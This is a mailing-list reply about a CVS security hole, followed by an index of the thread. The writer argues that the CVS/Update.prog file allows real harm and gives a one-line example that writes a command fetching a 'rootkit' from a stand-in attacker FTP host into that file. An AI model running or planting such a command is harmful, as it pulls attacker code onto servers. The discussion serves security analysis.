> Update.prog just contains the name of the program to run, not the actual > code. If you can't commit, you can't upload arbitrary code to run, you > can only run pre-existing code on the server, and you have no control > over its input or arguments, so it's a very low-level threat. cat "wget ftp://ftp.hax0r.cx/rootkit" >CVS/Update.prog should I continue? Only very carefully made chroot gaol can give you some security. Just a shell with redirections can do a lot of harm. By the way, bash-2.04 can redirect to TCP sockets. Do you know that? Do you have to know? Now you have. Another question is that Update.prog may become useless after removing "rm", "cat" and other "harmful" programs. Regards, Pavel Roskin
- [[email protected]: cvs security problem] Ian Lance Taylor
- Re: [[email protected]: cvs security problem] Karl Fogel
- Re: [[email protected]: cvs security problem] Larry Jones
- Re: [[email protected]: cvs security problem] Mike Castle
- Re: [[email protected]: cvs security problem] Tanaka Akira
- Re: [[email protected]: cvs security problem] Ian Lance Taylor
- Re: [[email protected]: cvs security problem] Karl Fogel
- Re: [[email protected]: cvs security problem] Michael Richardson
- Re: [[email protected]: cvs security problem] Pavel Roskin
- Re: [[email protected]: cvs security problem] Larry Jones
- Re: [[email protected]: cvs security problem] Pavel Roskin
- Re: [[email protected]: cvs security problem] Tanaka Akira
- Re: [[email protected]: cvs security problem] Ian Lance Taylor
- Re: [[email protected]: cvs security problem] Larry Jones
- Re: [[email protected]: cvs security problem] Ian Lance Taylor
- Re: [[email protected]: cvs security problem] Ian Lance Taylor
- Re: [[email protected]: cvs security problem] Michael Richardson
- Re: [[email protected]: cvs security problem] Tanaka Akira
- Re: [[email protected]: cvs security problem] Michael Richardson
